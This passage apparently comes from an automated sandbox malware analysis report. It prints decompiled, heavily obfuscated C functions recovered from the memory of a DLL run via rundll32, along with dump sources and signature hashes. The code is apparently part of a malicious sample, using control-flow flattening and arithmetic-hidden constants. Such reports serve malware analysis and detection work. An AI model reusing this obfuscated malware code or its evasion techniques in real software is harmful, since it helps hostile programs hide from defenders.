                                                                        				_v52 = _v52 ^ 0xf3453027;
                                                                        				_v40 = 0x2a5b;
                                                                        				_v40 = _v40 ^ 0x8a944271;
                                                                        				_v40 = _v40 + 0xffff3ddd;
                                                                        				_v40 = _v40 ^ 0x8a93ae26;
                                                                        				_v36 = 0xa033;
                                                                        				_t153 = 0x2a;
                                                                        				_v36 = _v36 / _t153;
                                                                        				_v36 = _v36 >> 7;
                                                                        				_v36 = _v36 ^ 0x000061ee;
                                                                        				_v32 = 0x8be0;
                                                                        				_v32 = _v32 | 0xe631180e;
                                                                        				_v32 = _v32 << 0xc;
                                                                        				_v32 = _v32 ^ 0x19bef193;
                                                                        				_v48 = 0xa7b3;
                                                                        				_t154 = 0x44;
                                                                        				_v48 = _v48 * 0x60;
                                                                        				_v48 = _v48 << 0xe;
                                                                        				_v48 = _v48 ^ 0xb8c85214;
                                                                        				_v28 = 0x762;
                                                                        				_v28 = _v28 | 0x9c151205;
                                                                        				_v28 = _v28 << 8;
                                                                        				_v28 = _v28 >> 8;
                                                                        				_v28 = _v28 ^ 0x0015065a;
                                                                        				_v44 = 0x58a5;
                                                                        				_v44 = _v44 >> 0xf;
                                                                        				_v44 = _v44 / _t154;
                                                                        				_v44 = _v44 ^ 0x00007339;
                                                                        				_v24 = 0xfaea;
                                                                        				_v24 = _v24 << 3;
                                                                        				_v24 = _v24 + 0xd2b0;
                                                                        				_t155 = 3;
                                                                        				_push(0x100015c0);
                                                                        				_v24 = _v24 / _t155;
                                                                        				_v24 = _v24 ^ 0x00028589;
                                                                        				_push(_v8);
                                                                        				E100163BF(E1001BF25(_v16, _v12, _v24), _v24, _v52, _v40, __edx, _v16, _v36, _a12, _a8, _v32);
                                                                        				return E1001C5F7(_v48, _v28, _v44, _v24, _t147);
                                                                        			}
























                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 9s$<4$[*$a
                                                                        • API String ID: 0-239331953
                                                                        • Opcode ID: d0e58df00b0c86ff922bd6907dfca745df99386b0e2c539687ea4503f84d7d05
                                                                        • Instruction ID: 5a9fb4e3a59909fd41fb50e737628130f046b5500317e57dd636ad6f2bf099bc
                                                                        • Opcode Fuzzy Hash: d0e58df00b0c86ff922bd6907dfca745df99386b0e2c539687ea4503f84d7d05
                                                                        • Instruction Fuzzy Hash: 06512571D00219EBDF08CFE5D94A8DEBBB2FB48314F208119E521B62A0D7B95A55CFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E100199A4() {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				signed int _v68;
                                                                        				signed int _v72;
                                                                        				signed int _v76;
                                                                        				signed int _v80;
                                                                        				signed int _v84;
                                                                        				signed int _v88;
                                                                        				signed int _v92;
                                                                        				signed int _v96;
                                                                        				signed int _v100;
                                                                        				signed int _v104;
                                                                        				signed int _v108;
                                                                        				char _v112;
                                                                        				short _t279;
                                                                        				short _t282;
                                                                        				void* _t290;
                                                                        				void* _t291;
                                                                        				void* _t315;
                                                                        				short* _t316;
                                                                        				void* _t317;
                                                                        				short* _t318;
                                                                        				short* _t319;
                                                                        				signed int _t320;
                                                                        				signed int _t321;
                                                                        				signed int _t322;
                                                                        				signed int _t323;
                                                                        				signed int _t324;
                                                                        				signed int _t325;
                                                                        				signed int _t326;
                                                                        				signed int _t327;
                                                                        				signed int _t328;
                                                                        				void* _t329;
                                                                        
                                                                        				_v88 = 0x9528;
                                                                        				_t315 =  *0x100221b0 + 0x10;
                                                                        				_v88 = _v88 << 0x10;
                                                                        				_t291 = 0x29b6ea94;
                                                                        				_v88 = _v88 ^ 0x95285eaa;
                                                                        				_v84 = 0xe890;
                                                                        				_t320 = 0x34;
                                                                        				_v84 = _v84 * 0x1f;
                                                                        				_v84 = _v84 ^ 0x001c45a3;
                                                                        				_v28 = 0x9112;
                                                                        				_v28 = _v28 / _t320;
                                                                        				_t321 = 0x19;
                                                                        				_v28 = _v28 * 0x31;
                                                                        				_v28 = _v28 << 0xc;
                                                                        				_v28 = _v28 ^ 0x088a98e7;
                                                                        				_v52 = 0xda31;
                                                                        				_v52 = _v52 >> 8;
                                                                        				_v52 = _v52 << 4;
                                                                        				_v52 = _v52 ^ 0x000066fb;
                                                                        				_v24 = 0xe82b;
                                                                        				_v24 = _v24 ^ 0xb4fe6801;
                                                                        				_v24 = _v24 >> 0xa;
                                                                        				_v24 = _v24 | 0xa81c026a;
                                                                        				_v24 = _v24 ^ 0xa83d3e65;
                                                                        				_v20 = 0x6909;
                                                                        				_v20 = _v20 + 0xffffc42e;
                                                                        				_v20 = _v20 << 0xd;
                                                                        				_v20 = _v20 / _t321;
                                                                        				_v20 = _v20 ^ 0x0039e32c;
                                                                        				_v60 = 0xab82;
                                                                        				_v60 = _v60 + 0xffff0bd3;
                                                                        				_t322 = 0xf;
                                                                        				_v60 = _v60 * 0x76;
                                                                        				_v60 = _v60 ^ 0xffdec8c4;
                                                                        				_v56 = 0x5e59;
                                                                        				_v56 = _v56 / _t322;
                                                                        				_v56 = _v56 >> 0xb;
                                                                        				_v56 = _v56 ^ 0x00001434;
                                                                        				_v96 = 0x977a;
                                                                        				_t323 = 0x6f;
                                                                        				_v96 = _v96 * 0x61;
                                                                        				_v96 = _v96 ^ 0x00397eb3;
                                                                        				_v92 = 0xa291;
                                                                        				_v92 = _v92 | 0x42e1adc5;
                                                                        				_v92 = _v92 ^ 0x42e1b77e;
                                                                        				_v40 = 0x73d4;
                                                                        				_v40 = _v40 / _t323;
                                                                        				_v40 = _v40 << 1;
                                                                        				_v40 = _v40 * 0x4a;
                                                                        				_v40 = _v40 ^ 0x0000cc60;
                                                                        				_v36 = 0x33bd;
                                                                        				_v36 = _v36 >> 5;
                                                                        				_v36 = _v36 ^ 0xc340ad00;
                                                                        				_v36 = _v36 << 0xb;
                                                                        				_v36 = _v36 ^ 0x0564fa7a;
                                                                        				_v64 = 0xc60;
                                                                        				_v64 = _v64 | 0x04416794;
                                                                        				_t324 = 0x5f;
                                                                        				_v64 = _v64 * 0xd;
                                                                        				_v64 = _v64 ^ 0x3752d4dc;
                                                                        				_v32 = 0xae9f;
                                                                        				_v32 = _v32 + 0x24a;
                                                                        				_v32 = _v32 + 0xffffd123;
                                                                        				_t325 = 0x3d;
                                                                        				_v32 = _v32 / _t324;
                                                                        				_v32 = _v32 ^ 0x0000400c;
                                                                        				_v72 = 0x4f8e;
                                                                        				_v72 = _v72 << 0xb;
                                                                        				_v72 = _v72 ^ 0x027c6373;
                                                                        				_v12 = 0x21f4;
                                                                        				_v12 = _v12 + 0x1717;
                                                                        				_v12 = _v12 * 0x19;
                                                                        				_v12 = _v12 + 0xffff4c52;
                                                                        				_v12 = _v12 ^ 0x00049658;
                                                                        				_v8 = 0xd7dc;
                                                                        				_v8 = _v8 ^ 0x4ae28678;
                                                                        				_v8 = _v8 * 0x67;
                                                                        				_v8 = _v8 + 0xffff8b2b;
                                                                        				_v8 = _v8 ^ 0x210e6813;
                                                                        				_v44 = 0x10ca;
                                                                        				_v44 = _v44 * 0xe;
                                                                        				_v44 = _v44 ^ 0x21d1d5f5;
                                                                        				_v44 = _v44 ^ 0x21d123f7;
                                                                        				_v48 = 0xfc7c;
                                                                        				_v48 = _v48 ^ 0x12e29e7b;
                                                                        				_v48 = _v48 ^ 0x780ab142;
                                                                        				_v48 = _v48 ^ 0x6ae8c2ee;
                                                                        				_v80 = 0x56f;
                                                                        				_t326 = 0x77;
                                                                        				_v80 = _v80 / _t325;
                                                                        				_v80 = _v80 ^ 0x0000686a;
                                                                        				_v16 = 0x940a;
                                                                        				_v16 = _v16 ^ 0x3241511d;
                                                                        				_v16 = _v16 << 2;
                                                                        				_v16 = _v16 | 0x2c0ae0b9;
                                                                        				_v16 = _v16 ^ 0xed0fff5b;
                                                                        				_v76 = 0xb74;
                                                                        				_v76 = _v76 | 0xff1ac2c7;
                                                                        				_v76 = _v76 ^ 0xff1aa207;
                                                                        				_v108 = 0xf16f;
                                                                        				_v108 = _v108 + 0xffff55fa;
                                                                        				_v108 = _v108 ^ 0x00000b68;
                                                                        				_v104 = 0x7f0f;
                                                                        				_v104 = _v104 / _t326;
                                                                        				_v104 = _v104 ^ 0x00004c16;
                                                                        				_v68 = 0xc425;
                                                                        				_v68 = _v68 << 0xf;
                                                                        				_v68 = _v68 | 0xc23afe3b;
                                                                        				_v68 = _v68 ^ 0xe23ab7b9;
                                                                        				_v100 = 0xccd6;
                                                                        				_v100 = _v100 | 0x04b2265a;
                                                                        				_v100 = _v100 ^ 0x04b29fa8;
                                                                        				_t290 = 2;
                                                                        				do {
                                                                        					while(_t291 != 0x2226ace9) {
                                                                        						if(_t291 == 0x2622bc84) {
                                                                        							_push(_t291);
                                                                        							_t327 = E1000607F(_t291, __eflags, _t291, 0x10, 4);
                                                                        							E1000D940(_t315, _v56, _v96, _v92, _t290,  &_v112, 1);
                                                                        							_t317 = _t315 + _t290;
                                                                        							E1000D940(_t317, _v36, _v64, _v32, 1,  &_v112, _t327);
                                                                        							_t329 = _t329 + 0x40;
                                                                        							_t318 = _t317 + _t327 * 2;
                                                                        							_t291 = 0x29e4095b;
                                                                        							_t279 = 0x5c;
                                                                        							 *_t318 = _t279;
                                                                        							_t315 = _t318 + _t290;
                                                                        							continue;
                                                                        						} else {
                                                                        							if(_t291 == 0x29b6ea94) {
                                                                        								_t282 = E10017B6B();
                                                                        								_v112 = _t282;
                                                                        								_t291 = 0x2622bc84;
                                                                        								continue;
                                                                        							} else {
                                                                        								_t334 = _t291 - 0x29e4095b;
                                                                        								if(_t291 == 0x29e4095b) {
                                                                        									_push(_t291);
                                                                        									_t328 = E1000607F(_t291, _t334, _t291, 0x10, 4);
                                                                        									E1000D940(_t315, _v80, _v16, _v76, 1,  &_v112, _t328);
                                                                        									_t329 = _t329 + 0x28;
                                                                        									_t319 = _t315 + _t328 * 2;
                                                                        									_t291 = 0x2226ace9;
                                                                        									_t282 = 0x2e;
                                                                        									 *_t319 = _t282;
                                                                        									_t315 = _t319 + _t290;
                                                                        									continue;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L9;
                                                                        					}
                                                                        					E1000D940(_t315, _v104, _v68, _v100, 1,  &_v112, 3);
                                                                        					_t316 = _t315 + 6;
                                                                        					_t329 = _t329 + 0x18;
                                                                        					_t291 = 0x2b0037fd;
                                                                        					 *_t316 = 0;
                                                                        					_t315 = _t316 + _t290;
                                                                        					__eflags = _t315;
                                                                        					L9:
                                                                        					__eflags = _t291 - 0x2b0037fd;
                                                                        				} while (__eflags != 0);
                                                                        				return _t282;
                                                                        			}


















































                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,9$[)$[)
                                                                        • API String ID: 0-3362820381
                                                                        • Opcode ID: 603117b8363adce16010609699c3a886c8196d66e76f24d38a98b26cfbd9f97d
                                                                        • Instruction ID: 44abcb00151ec1b00a79a92a733cf4ca5547ce6a62ffc74197264c17b034da66
                                                                        • Opcode Fuzzy Hash: 603117b8363adce16010609699c3a886c8196d66e76f24d38a98b26cfbd9f97d
                                                                        • Instruction Fuzzy Hash: 2AC13475D00309DBEB18CFE5D98A9DEBBB6FB44304F208119E116BB2A4C3B55A46CF40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E1000D0DE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                        				char _v4;
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				void* _t133;
                                                                        				void* _t144;
                                                                        				signed int _t153;
                                                                        				signed int _t154;
                                                                        				void* _t157;
                                                                        				void* _t169;
                                                                        				void* _t170;
                                                                        				signed int* _t173;
                                                                        
                                                                        				_push(_a16);
                                                                        				_t169 = __ecx;
                                                                        				_push(_a12);
                                                                        				_push(_a8);
                                                                        				_push(_a4);
                                                                        				_push(__edx);
                                                                        				_push(__ecx);
                                                                        				E100056B2(_t133);
                                                                        				_v48 = 0x5a8b;
                                                                        				_t173 =  &(( &_v60)[6]);
                                                                        				_v48 = _v48 ^ 0x4360b52a;
                                                                        				_v48 = _v48 ^ 0x1a806351;
                                                                        				_t170 = 0;
                                                                        				_v48 = _v48 >> 2;
                                                                        				_t157 = 0x13068ceb;
                                                                        				_v48 = _v48 ^ 0x1678233d;
                                                                        				_v8 = 0x8630;
                                                                        				_v8 = _v8 >> 4;
                                                                        				_v8 = _v8 ^ 0x00000862;
                                                                        				_v52 = 0x326b;
                                                                        				_v52 = _v52 >> 1;
                                                                        				_v52 = _v52 | 0xc7f7cfdb;
                                                                        				_v52 = _v52 ^ 0x87f7dfff;
                                                                        				_v12 = 0x4e1;
                                                                        				_v12 = _v12 | 0x6d92ca4a;
                                                                        				_v12 = _v12 ^ 0x2d92ceeb;
                                                                        				_v28 = 0xfb25;
                                                                        				_v28 = _v28 | 0x71bf14c1;
                                                                        				_v28 = _v28 << 8;
                                                                        				_v28 = _v28 ^ 0xbfffdb80;
                                                                        				_v32 = 0xf237;
                                                                        				_v32 = _v32 >> 4;
                                                                        				_v32 = _v32 >> 0xf;
                                                                        				_v32 = _v32 ^ 0x000074ee;
                                                                        				_v36 = 0xcd16;
                                                                        				_t153 = 0x3c;
                                                                        				_v36 = _v36 * 0x44;
                                                                        				_v36 = _v36 ^ 0x3fdc784b;
                                                                        				_v36 = _v36 ^ 0x3fea737c;
                                                                        				_v20 = 0xb3fe;
                                                                        				_v20 = _v20 >> 7;
                                                                        				_v20 = _v20 ^ 0x00007694;
                                                                        				_v56 = 0xdd00;
                                                                        				_v56 = _v56 * 0x23;
                                                                        				_v56 = _v56 + 0xffff9337;
                                                                        				_v56 = _v56 << 7;
                                                                        				_v56 = _v56 ^ 0x0ee528fc;
                                                                        				_v60 = 0xf711;
                                                                        				_v60 = _v60 >> 4;
                                                                        				_v60 = _v60 | 0x4989a590;
                                                                        				_v60 = _v60 + 0xffff6a05;
                                                                        				_v60 = _v60 ^ 0x49891a0f;
                                                                        				_v40 = 0x92cf;
                                                                        				_v40 = _v40 ^ 0xf586a06e;
                                                                        				_v40 = _v40 + 0xffff6eef;
                                                                        				_v40 = _v40 << 0xd;
                                                                        				_v40 = _v40 ^ 0xb4326dcb;
                                                                        				_v44 = 0x65dd;
                                                                        				_v44 = _v44 / _t153;
                                                                        				_v44 = _v44 << 6;
                                                                        				_v44 = _v44 + 0xffff872c;
                                                                        				_v44 = _v44 ^ 0xffffb82a;
                                                                        				_v16 = 0xf090;
                                                                        				_t154 = 0x21;
                                                                        				_v16 = _v16 / _t154;
                                                                        				_v16 = _v16 ^ 0x00005a72;
                                                                        				_v24 = 0xb1df;
                                                                        				_v24 = _v24 * 6;
                                                                        				_v24 = _v24 << 9;
                                                                        				_v24 = _v24 ^ 0x08564d31;
                                                                        				while(_t157 != 0x13068ceb) {
                                                                        					if(_t157 == 0x32a00bf2) {
                                                                        						_t144 = E1001551E(_a16,  &_v4, _v28, _t169, 0, _v52 | _v48, _v32, _v36, _v20);
                                                                        						_t173 =  &(_t173[7]);
                                                                        						if(_t144 != 0) {
                                                                        							_t157 = 0x39bb1850;
                                                                        							continue;
                                                                        						}
                                                                        					} else {
                                                                        						if(_t157 == 0x367d931e) {
                                                                        							E1001551E(_a16,  &_v4, _v40, _t169, _t170, _v12 | _v8, _v44, _v16, _v24);
                                                                        						} else {
                                                                        							if(_t157 != 0x39bb1850) {
                                                                        								L10:
                                                                        								if(_t157 != 0x1d94fa77) {
                                                                        									continue;
                                                                        								} else {
                                                                        								}
                                                                        							} else {
                                                                        								_push(_t157);
                                                                        								_t170 = E100157E8(_v4 + _v4);
                                                                        								if(_t170 != 0) {
                                                                        									_t157 = 0x367d931e;
                                                                        									continue;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					return _t170;
                                                                        				}
                                                                        				_t157 = 0x32a00bf2;
                                                                        				goto L10;
                                                                        			}

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: k2$rZ$|s?
                                                                        • API String ID: 0-1348797666
                                                                        • Opcode ID: 1a504f0c04b87af0b1b48271f2f1a4297b55bdfd64aa91b8cb3f8916695204b1
                                                                        • Instruction ID: c5a9857de1bd72a55434b072a893e00a77e4adad4e3d5eb919c6f6467bcc56a9
                                                                        • Opcode Fuzzy Hash: 1a504f0c04b87af0b1b48271f2f1a4297b55bdfd64aa91b8cb3f8916695204b1
                                                                        • Instruction Fuzzy Hash: 84610E71109341AFD358CF25C88981FBBE1FB98788F50591DF5969A260D3B2CA49CF93
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E1001DB25(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                        				char _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				signed int _v68;
                                                                        				signed int _v72;
                                                                        				signed int _v76;
                                                                        				signed int _v80;
                                                                        				signed int _v84;
                                                                        				signed int _v88;
                                                                        				signed int _v92;
                                                                        				signed int _v96;
                                                                        				void* _t118;
                                                                        				void* _t135;
                                                                        				signed int _t138;
                                                                        				signed int _t139;
                                                                        				signed int _t140;
                                                                        				signed int _t141;
                                                                        				void* _t144;
                                                                        				void* _t163;
                                                                        				signed int* _t166;
                                                                        
                                                                        				_push(_a16);
                                                                        				_t162 = _a4;
                                                                        				_push(_a12);
                                                                        				_push(_a8);
                                                                        				_push(_a4);
                                                                        				_push(__edx);
                                                                        				_push(__ecx);
                                                                        				E100056B2(_t118);
                                                                        				_v96 = 0x6541;
                                                                        				_t166 =  &(( &_v96)[6]);
                                                                        				_v96 = _v96 ^ 0x91bfb37d;
                                                                        				_v96 = _v96 >> 0x10;
                                                                        				_t163 = 0;
                                                                        				_v96 = _v96 << 0xe;
                                                                        				_t144 = 0xd16dbf6;
                                                                        				_v96 = _v96 ^ 0x246feaa2;
                                                                        				_v80 = 0xafef;
                                                                        				_v80 = _v80 + 0xd5f0;
                                                                        				_v80 = _v80 >> 8;
                                                                        				_v80 = _v80 ^ 0x000020f9;
                                                                        				_v60 = 0x3fa;
                                                                        				_v60 = _v60 << 8;
                                                                        				_v60 = _v60 ^ 0x0003a875;
                                                                        				_v68 = 0xdac3;
                                                                        				_v68 = _v68 >> 4;
                                                                        				_t138 = 0x79;
                                                                        				_v68 = _v68 * 0x37;
                                                                        				_v68 = _v68 ^ 0x0002ab2a;
                                                                        				_v56 = 0xacb2;
                                                                        				_v56 = _v56 << 3;
                                                                        				_v56 = _v56 ^ 0x00056a81;
                                                                        				_v72 = 0x451e;
                                                                        				_v72 = _v72 << 0xa;
                                                                        				_v72 = _v72 >> 1;
                                                                        				_v72 = _v72 ^ 0x008a68a2;
                                                                        				_v76 = 0xa9b5;
                                                                        				_v76 = _v76 ^ 0x71c268bb;
                                                                        				_v76 = _v76 >> 0xb;
                                                                        				_v76 = _v76 ^ 0x000e50b8;
                                                                        				_v84 = 0x733c;
                                                                        				_v84 = _v84 + 0xffff2d0a;
                                                                        				_v84 = _v84 | 0xc6f06430;
                                                                        				_v84 = _v84 + 0xffffe838;
                                                                        				_v84 = _v84 ^ 0xffffb7ce;
                                                                        				_v88 = 0xd1fe;
                                                                        				_v88 = _v88 / _t138;
                                                                        				_v88 = _v88 | 0xc6561511;
                                                                        				_t139 = 0x35;
                                                                        				_v88 = _v88 / _t139;
                                                                        				_v88 = _v88 ^ 0x03be11ae;
                                                                        				_v64 = 0xb503;
                                                                        				_v64 = _v64 ^ 0x4b2bbc6a;
                                                                        				_v64 = _v64 + 0xffffbb02;
                                                                        				_v64 = _v64 ^ 0x4b2ab619;
                                                                        				_v92 = 0x25d2;
                                                                        				_t140 = 0x57;
                                                                        				_v92 = _v92 * 0x42;
                                                                        				_v92 = _v92 / _t140;
                                                                        				_t141 = 0x2f;
                                                                        				_v92 = _v92 / _t141;
                                                                        				_v92 = _v92 ^ 0x00006e4e;
                                                                        				do {
                                                                        					while(_t144 != 0xd16dbf6) {
                                                                        						if(_t144 == 0x14ed0f49) {
                                                                        							__eflags = E1001D290(_v84, _v88, _v64, _t162 + 8, _v92,  &_v52);
                                                                        							_t163 =  !=  ? 1 : _t163;
                                                                        						} else {
                                                                        							if(_t144 == 0x2713230a) {
                                                                        								_t135 = E10009899(_t162, _v68, __eflags,  &_v52, _v56, _v72, _v76);
                                                                        								_t166 =  &(_t166[4]);
                                                                        								__eflags = _t135;
                                                                        								if(__eflags != 0) {
                                                                        									_t144 = 0x14ed0f49;
                                                                        									continue;
                                                                        								}
                                                                        							} else {
                                                                        								if(_t144 != 0x2ae8b971) {
                                                                        									goto L9;
                                                                        								} else {
                                                                        									E1001F3E9(_v96, _v80, _v60, _a12,  &_v52);
                                                                        									_t166 =  &(_t166[3]);
                                                                        									_t144 = 0x2713230a;
                                                                        									continue;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						L12:
                                                                        						return _t163;
                                                                        					}
                                                                        					_t144 = 0x2ae8b971;
                                                                        					L9:
                                                                        					__eflags = _t144 - 0x88de44a;
                                                                        				} while (__eflags != 0);
                                                                        				goto L12;
                                                                        			}

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: <s$Ae$Nn
                                                                        • API String ID: 0-1679991533
                                                                        • Opcode ID: 92a5fa941ec84b2a13816d9790ac9f10e8bf9b01ff2aa242d1ce98f0185b00fe
                                                                        • Instruction ID: a6ffe0389ab2164942154368da0f3f4b89edecd288a42e9cb3f2d23efd3a417b
                                                                        • Opcode Fuzzy Hash: 92a5fa941ec84b2a13816d9790ac9f10e8bf9b01ff2aa242d1ce98f0185b00fe
                                                                        • Instruction Fuzzy Hash: 995176712083419FD358EF21D88951BBBE1FBC8348F508A1DF59996260D7B5CA49CF83
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10010F6D() {
                                                                        				signed char _v2;
                                                                        				signed int _v276;
                                                                        				signed int _v280;
                                                                        				char _v284;
                                                                        				signed short _v320;
                                                                        				intOrPtr _v324;
                                                                        				intOrPtr _v328;
                                                                        				intOrPtr _v332;
                                                                        				intOrPtr _v336;
                                                                        				signed int _v340;
                                                                        				signed int _v344;
                                                                        				signed int _v348;
                                                                        				signed int _v352;
                                                                        				signed int _v356;
                                                                        				signed int _v360;
                                                                        				signed int _v364;
                                                                        				signed int _v368;
                                                                        				void* _t107;
                                                                        				signed int _t119;
                                                                        				signed int _t120;
                                                                        				signed int _t121;
                                                                        				intOrPtr _t123;
                                                                        				signed int* _t125;
                                                                        
                                                                        				_t125 =  &_v368;
                                                                        				_v336 = 0x6cd7e4;
                                                                        				_v332 = 0x3eb088;
                                                                        				_t107 = 0x11f8fc3e;
                                                                        				_t123 = 0;
                                                                        				_v328 = 0;
                                                                        				_v324 = 0;
                                                                        				_v340 = 0x4b20;
                                                                        				_v340 = _v340 | 0xad173eb8;
                                                                        				_v340 = _v340 ^ 0xad171b79;
                                                                        				_v368 = 0x5c5a;
                                                                        				_v368 = _v368 | 0x9193e072;
                                                                        				_v368 = _v368 ^ 0x84c7a0cb;
                                                                        				_t119 = 0x62;
                                                                        				_v368 = _v368 / _t119;
                                                                        				_v368 = _v368 ^ 0x0037af10;
                                                                        				_v352 = 0x141d;
                                                                        				_v352 = _v352 + 0xbd3d;
                                                                        				_t120 = 0x7c;
                                                                        				_v352 = _v352 * 7;
                                                                        				_v352 = _v352 ^ 0x0005e092;
                                                                        				_v344 = 0x5f9b;
                                                                        				_v344 = _v344 | 0x8244af57;
                                                                        				_v344 = _v344 ^ 0x8244aa36;
                                                                        				_v360 = 0xe6d9;
                                                                        				_v360 = _v360 + 0xa592;
                                                                        				_v360 = _v360 / _t120;
                                                                        				_t121 = 0x1b;
                                                                        				_v360 = _v360 * 0x3c;
                                                                        				_v360 = _v360 ^ 0x0000cf96;
                                                                        				_v356 = 0x3abe;
                                                                        				_v356 = _v356 >> 0x10;
                                                                        				_v356 = _v356 >> 6;
                                                                        				_v356 = _v356 ^ 0x00000525;
                                                                        				_v364 = 0x1f65;
                                                                        				_v364 = _v364 >> 6;
                                                                        				_v364 = _v364 * 0x16;
                                                                        				_v364 = _v364 | 0xfb440427;
                                                                        				_v364 = _v364 ^ 0xfb445ef1;
                                                                        				_v348 = 0x48;
                                                                        				_v348 = _v348 / _t121;
                                                                        				_v348 = _v348 ^ 0x0000083a;
                                                                        				do {
                                                                        					while(_t107 != 0x2ebf197) {
                                                                        						if(_t107 == 0x11f8fc3e) {
                                                                        							_t107 = 0x2ebf197;
                                                                        							continue;
                                                                        						} else {
                                                                        							if(_t107 == 0x13d7564d) {
                                                                        								_t107 = 0x32df2d5c;
                                                                        								_t123 = _t123 + (_v2 & 0x000000ff) * 0x186a0;
                                                                        								continue;
                                                                        							} else {
                                                                        								if(_t107 == 0x2725b2a4) {
                                                                        									E10008EB8(_v360, _v356,  &_v320, _v364, _v348);
                                                                        									_t125 =  &(_t125[3]);
                                                                        									_t107 = 0x13d7564d;
                                                                        									continue;
                                                                        								} else {
                                                                        									if(_t107 == 0x2976fc0f) {
                                                                        										_t123 = _t123 + (_v320 & 0x0000ffff);
                                                                        									} else {
                                                                        										if(_t107 == 0x2ab6fad8) {
                                                                        											_t107 = 0x2976fc0f;
                                                                        											_t123 = _t123 + _v276 * 0x64;
                                                                        											continue;
                                                                        										} else {
                                                                        											if(_t107 != 0x32df2d5c) {
                                                                        												goto L14;
                                                                        											} else {
                                                                        												_t107 = 0x2ab6fad8;
                                                                        												_t123 = _t123 + _v280 * 0x3e8;
                                                                        												continue;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						L17:
                                                                        						return _t123;
                                                                        					}
                                                                        					_v284 = 0x11c;
                                                                        					E10018EA4(_v340, _v368,  &_v284, _v352, _v344);
                                                                        					_t125 =  &(_t125[3]);
                                                                        					_t107 = 0x2725b2a4;
                                                                        					L14:
                                                                        				} while (_t107 != 0x1e073579);
                                                                        				goto L17;
                                                                        			}



























                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: K$H$Z\
                                                                        • API String ID: 0-1080206182
                                                                        • Opcode ID: 7acbd81a9cb121969d6a9ac1592260c1e46ce6c2f983d3fe9c9f259f75efb378
                                                                        • Instruction ID: 3bc7b4ca0c7fcb2c5b05920913665c9c43f334923cd28bf2cbd3076ac86a8cde
                                                                        • Opcode Fuzzy Hash: 7acbd81a9cb121969d6a9ac1592260c1e46ce6c2f983d3fe9c9f259f75efb378
